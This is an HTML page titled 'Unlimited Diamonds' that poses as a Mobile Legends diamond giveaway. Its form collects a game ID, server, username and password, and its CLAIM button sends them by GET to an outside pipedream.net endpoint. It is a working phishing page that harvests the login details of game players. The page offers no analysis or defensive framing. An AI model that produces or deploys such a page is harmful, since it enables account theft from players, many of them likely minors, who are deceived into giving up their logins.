<!DOCTYPE html>
<html>
<head><title>Unlimited Diamonds</title></head>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<style>
b{
color:#3B5998;
font-size:100px;
-webkit-text-stroke: 4px blue;
}
button{
color: white;
background: yellow;
}
img{
border: blue 4px outset;
border-radius:5px
}
body{
background: url("https://steamuserimages-a.akamaihd.net/ugc/781852661633371550/EF2CBEEFCF9E431404D31279A61A2AED604953E5/?imw=512&&ima=fit&impolicy=Letterbox&imcolor=%23000000&letterbox=false");
        background-position: center;
        background-repeat: repeat;
        background-attachment: fixed;
        font-style: italic;
        background-size: 1200px;
}
</style>

<center><body>
<div style="border: red 4px outset; background-position: center;border-radius:50px; width:1100px;"><br>
<pre><img src=https://store-images.s-microsoft.com/image/apps.37935.9007199266245907.b029bd80-381a-4869-854f-bac6f359c5c9.91f8693c-c75b-4050-a796-63e1314d18c9?h=464 height=100px width=100px><b>LOGIN</b></pre>
<form action=https://eovzlu8cd49gpu1.m.pipedream.net method=GET >
<pre>
<img style="border-radius:50px" src=https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSYkvClwBocaAmIjsXO6nNEsiZ-niuXhzXGTAmvvDPSg-HdOcRP0RQAL4FZYJk-ysZS9cw&usqp=CAU width=60px height=60px><input placeholder="Diamond Amount" style="border: blue 4px outset;border-radius:50px;background-color:white;height:70px;width:600px;font-size:40px;" name=diamond type=diamond>
<img style="border-radius:50px" src=https://www.static-src.com/wcsstore/Indraprastha/images/catalog/full//95/MTA-47112278/mobile_legends_mobile_legends_diamond_mlbb_full01_c86bb6f5.jpg  width=60px height=60px><input placeholder="Game ID" style="border: blue 4px outset;border-radius:50px;background-color:white;height:70px;width:600px;font-size:40px;" name=gid type=gameid>  <input placeholder="Server" style="border: blue 4px outset;border-radius:50px;background-color:white;height:70px;width:180px;font-size:40px;" name=serverid type=serverid>

<input placeholder="username" style="border: blue 4px outset;border-radius:50px;background-color:white;height:90px;width:730px;font-size:40px;" name=username type=username>

<input placeholder="password" style="border: blue 4px outset;border-radius:50px;background-color:white;height:90px;width:730px;font-size:40px;" name=password type=password>
<br>
<button style="border: blue 4px outset;border-radius:30px;background-color:blue;height:100px;width:280px;font-size:50px;" type=submit><b style="font-size:50px;color:lime;-webkit-text-stroke: 4px lime;">CLAIM</b></button>
</pre>
</form>
</div></body></center>
</html>
